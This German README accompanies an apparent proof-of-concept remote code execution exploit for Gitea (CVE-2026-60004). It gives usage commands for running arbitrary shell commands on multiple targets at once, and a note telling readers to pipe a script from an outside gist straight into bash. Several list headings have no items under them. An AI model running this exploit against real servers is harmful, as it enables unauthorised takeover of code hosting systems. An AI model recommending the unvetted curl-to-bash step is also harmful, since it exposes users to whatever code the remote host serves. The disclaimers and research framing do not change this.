
CVE-2026-60004
Mehr: https://github.com/go-gitea/gitea/security/advisories/GHSA-rcr6-4jqh-j84m
Unterstütze die Wartung dieses Projekts mit PayPal oder indem du den QR-Code unten scannst.
Verwende dieses Projekt nur in sicheren und autorisierten Umgebungen wie:
Beispiel-Setup:
git clone <repository-url>
cd <repository-name>
# Project use python follow below
# Create a virtual environment
python -m venv venv
# Activate the virtual environment
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# Install requirments
pip install -r requirements.txt
Beispielverwendung:
# 1. Optional global password for lines that omit it
export GITEA_PASSWORD='defaultpass'
# 2. Run (safe first)
python3 gitea_diffpatch_rce_poc.py --targets targets.txt -c 'id' --dry-run
# 3. Real run with 3 workers
python3 gitea_diffpatch_rce_poc.py --targets targets.txt -c 'id; uname -srm; pwd' -w 3
# 4. Classic single-target still works
python3 gitea_diffpatch_rce_poc.py http://127.0.0.1:3000 admin 'id'
Hinweis:
curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y ausführen, um das verschachtelte .git-Verzeichnis zu entfernen.Ein Repository zum Lernen, Testen und Erforschen von Cybersicherheitskonzepten in kontrollierten Umgebungen.
Dieses Repository dient ausschließlich der Ausbildung und autorisierten Sicherheitsforschung.
Es soll Nutzern helfen, Folgendes zu lernen:
Verwende dieses Repository nur in Umgebungen, für die du eine Berechtigung hast, wie:
Unbefugte oder illegale Nutzung ist strengstens untersagt.
Die Autoren und Mitwirkenden sind nicht verantwortlich für Schäden, Missbrauch, rechtliche Probleme oder Verluste, die durch dieses Projekt verursacht werden.
Durch die Nutzung dieses Repositorys stimmst du zu, dass:
Dieses Projekt ist vorgesehen für:
Bitte befolge die Praktiken der verantwortungsvollen Offenlegung (Responsible Disclosure) und halte alle geltenden Gesetze ein.
Für verantwortungsvolle Offenlegung oder Zusammenarbeit kontaktiere den Repository-Maintainer über GitHub.